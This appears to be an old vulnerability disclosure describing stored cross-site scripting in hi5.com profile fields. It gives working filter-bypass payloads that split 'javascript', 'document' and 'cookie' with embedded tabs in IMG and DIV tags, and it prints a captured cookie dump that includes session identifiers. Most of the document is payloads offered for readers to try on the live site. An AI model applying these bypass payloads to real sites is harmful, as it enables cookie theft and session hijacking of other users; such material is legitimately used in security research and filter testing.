hi5.com - XSS with cookie disclosure
hi5.com
Homepage:
http://www.hi5.com
Affected files:
Input boxes of editing your profile.
XSS Vuln with cookie disclosure:
It seems hi5.com allows alot of html tags to be used on thier site but they
will filter out words like javascript, applet, and iframe tags (which is to be
expected). Heres a link to the page that lists allthe tags they will and won't
allow:
http://hi5.com/friend/account/html_tips.html
How do we get around this? Well, to get around the javascript filtering we use
An embedded encoded tab to break up the javascript word. Below are a few
examples of it. For PoC try putting this in your profile. (I used the Hometown
box, all should work tho) :
<IMG SRC="jav	ascript:alert('XSS');">
or
<DIV STYLE="background-image: url(jav	ascript:al	ert('XSS'))">
Why do we have to use an embedded encoded tab in the word "alert" in a div tag
and not a img tag? I have no idea!
Screenshots:
http://www.youfucktard.com/xsp/hi52.jpg
http://www.youfucktard.com/xsp/hi53.jpg
WHERES THE COOKIE?!?!
Now lets change that so we can show our cookie data. Since they don't seem to
allow thewords document and cookie,
lets use the same method above to break it up. Try putting:
Popup alert:
<IMG SRC="jav	ascript:alert(docu	ment.coo	kie);">
Write on screen:
<IMG SRC="jav	ascript:docu	ment.write(docu	ment.cookie);">
Our Cookie:
hi5banner_traffic_US; hi5medium_traffic_US; hi5sky_traffic_US; hi5uniqueAd2=1;
hi5adcomRect; hi5adcomSky;
hi5inpath=-1;hi5sp=homepage;hi5loggedIn=true;adHistoryLdr=4:1150268890485:4:1150268897936:1:1150269052890:1:1150269092966:8:1150269130139:9:1150269256989:9:1150269310562:10:1150269315812:11:1150269416327:11:1150269438591:12:1150269446349:13:1150269502289:13:1150269518708:14:1150269567146:15:1150269654968;
sc=Fics:0:Ficb:0:Ficl:0; JSESSIONID=a229uu7JgBN7;
K-JSESSIONID0x9882f778=6821EBA8AA2FB03B1F4D6B04A2799FED;adHistoryRct=1001:1150268898713:1001:1150269130834:1004:1150269316178:1004:1150269447018:1002:1150269519194:1002:1150269669974:1008:1150269721357:1007:1150269799646:1007:1150269971317:1010:1150270159468:1011:1150270778028:1011:1150270823873:1012:1150270950243;adHistorySky=2004:1150269046423:2004:1150269086714:2001:1150269250710:2001:1150269303450:2008:1150269409727:2007:1150269432295:2007:1150269495667:2020:1150269560927:2002:1150269648476:2002:1150269691452:2012:115
0269709420:2011:1150269751737:2011:1150269785251:2014:1150270053753:2015:1150270141733
Screenshots:
http://www.youfucktard.com/xsp/hi54.jpg
http://www.youfucktard.com/xsp/hi55.jpg